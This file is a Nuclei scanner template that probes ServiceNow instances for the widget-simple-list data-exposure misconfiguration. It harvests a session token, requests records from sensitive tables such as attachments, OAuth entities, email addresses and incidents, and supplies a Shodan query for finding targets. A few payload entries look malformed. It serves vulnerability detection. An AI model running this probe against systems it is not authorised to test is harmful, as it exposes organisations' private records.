87 lines
2.2 KiB
YAML
87 lines
2.2 KiB
YAML
id: servicenow-widget-misconfig
|
|
|
|
info:
|
|
name: ServiceNow Widget-Simple-List - Misconfiguration
|
|
author: DhiyaneshDk
|
|
severity: unknown
|
|
reference:
|
|
- https://github.com/bsysop/servicenow
|
|
- https://twitter.com/ConspiracyProof/status/1713270026046685272
|
|
- https://www.enumerated.ie/servicenow-data-exposure
|
|
metadata:
|
|
verified: true
|
|
max-request: 54
|
|
shodan-query: title:"servicenow"
|
|
tags: servicenow,widget,misconfig
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
@once
|
|
GET / HTTP/1.1
|
|
Host: {{Hostname}}
|
|
- |
|
|
@once
|
|
GET /login.do HTTP/1.1
|
|
Host: {{Hostname}}
|
|
- |
|
|
POST /api/now/sp/widget/widget-simple-list?{{table_list}} HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Accept: application/json
|
|
X-UserToken: {{user-token}}
|
|
Content-Type: application/json
|
|
|
|
{}
|
|
|
|
cookie-reuse: true
|
|
payloads:
|
|
table_list:
|
|
- t=kb_knowledge&f=text
|
|
- t=cmdb_model&f=name
|
|
- t=cmn_department&f=app_name
|
|
- t=licensable_app&f=app_name
|
|
- t=alm_asset&f=display_name
|
|
- t=sys_attachment&f=file_name
|
|
- t=sys_attachment_doc&f=data
|
|
- t=oauth_entity&f=name
|
|
- t=cmn_cost_center&f=name
|
|
- t=cmdb_model&f=name
|
|
- t=sc_cat_item&f=name
|
|
- t=sn_admin_center_application&f-name
|
|
- t=cmn_company&f=name
|
|
- t=sys_email_attachment&f=email
|
|
- t=sys_email_attachment&f=attachment
|
|
- t=cmn_notif_device&f=email_address
|
|
- t=sys_portal_age&f=display_name
|
|
- t=incident&f=short_description
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '"isValid":true'
|
|
- '"count":'
|
|
condition: and
|
|
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- '"display_value":"(.*)",'
|
|
|
|
extractors:
|
|
- type: regex
|
|
name: user-token
|
|
group: 1
|
|
regex:
|
|
- var g_ck = '([0-9a-z]+)'
|
|
internal: true
|
|
|
|
- type: regex
|
|
part: body
|
|
group: 1
|
|
regex:
|
|
- '"count":([0-9]+),'
|
|
|
|
# digest: 4a0a0047304502206b22efe69ad4efc305da1c7eeaab03f6e38fff2485bfbc680b1ae92463b29138022100b7c6035241a5106c9dc5c506f77b289aaddc6088933d29cb14319d80a86796e0:922c64590222798bb761d5b6d8e72950
|